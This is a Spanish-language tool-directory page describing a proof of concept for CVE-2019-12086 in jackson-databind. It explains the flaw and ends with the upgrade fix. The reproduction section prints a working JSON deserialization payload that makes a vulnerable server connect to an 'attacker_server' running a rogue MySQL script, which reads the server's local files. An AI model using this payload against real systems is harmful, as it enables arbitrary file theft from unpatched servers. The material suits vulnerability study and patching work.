Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-12086-jackson-databind-file-read — Prueba de concepto para CVE-2019-12086: vulnerabilidad de deserialización de Jackson databind que permite la lectura arbitraria de archivos mediante un servidor MySQL malicioso cuando Default Typing está habilitado. | Kitploit
Herramientas/GitHubGitHub/motoyasu-saburi/cve-2019-12086-jackson-databind-file-read
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubmotoyasu-saburi/cve-2019-12086-jackson-databind-file-read

CVE-2019-12086-jackson-databind-file-read

Prueba de concepto para CVE-2019-12086: vulnerabilidad de deserialización de Jackson databind que permite la lectura arbitraria de archivos mediante un servidor MySQL malicioso cuando Default Typing está habilitado.

Ver Repositorio
1211hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

jackson-CVE-2019-12086

Descripción de la vulnerabilidad

Cuando Default Typing está habilitado y en el classpath existe mysql-connector-java versión 8.0.15 (publicada el 1 de febrero de 2019) o inferior, un atacante puede leer archivos arbitrarios enviando datos JSON maliciosos. La librería mysql-connector-java es la mysql JDBC comúnmente utilizada para conectar bases de datos.

La descripción de CVE es la siguiente:

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.

Análisis de la vulnerabilidad

Detalles de la vulnerabilidad:

  1. Cuando Default Typing está habilitado, al deserializar JSON, Jackson puede deserializar una clase específica, y puede especificar un valor de tipo básico como parámetro del constructor de esa clase.
  2. El constructor de com.mysql.cj.jdbc.admin.MiniAdmin acepta un valor de tipo string, que representa una URL JDBC. La clase com.mysql.cj.jdbc.admin.MiniAdmin se conecta a la base de datos MySQL especificada en esa URL JDBC durante la inicialización.
  • En versiones de mysql-connector-java 8.0.15 (publicada el 1 de febrero de 2019) o inferiores, un servidor MySQL malicioso puede leer cualquier archivo local del cliente MySQL, lo que provoca la vulnerabilidad.
  • Reproducción de la vulnerabilidad

    1. Iniciar un servidor MySQL malicioso: https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

    python rogue_mysql_server.py

    1. Ver mysql.log en el mismo directorio:

    tail -f mysql.log

    1. Enviar el siguiente JSON a la aplicación vulnerable:

    ["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

    1. Cuando Jackson deserializa el JSON malicioso, se conecta al servidor MySQL malicioso y el contenido del archivo leído se escribe en mysql.log del servidor malicioso.
    root@kitploit:~
    # edit IP & Port at the payload  "./volume/src/main/java/poc/Main.java".
    $ docker build . 
    

    Corrección de la vulnerabilidad

    Actualizar Jackson a la versión 2.9.9 o superior.

    Descargar herramienta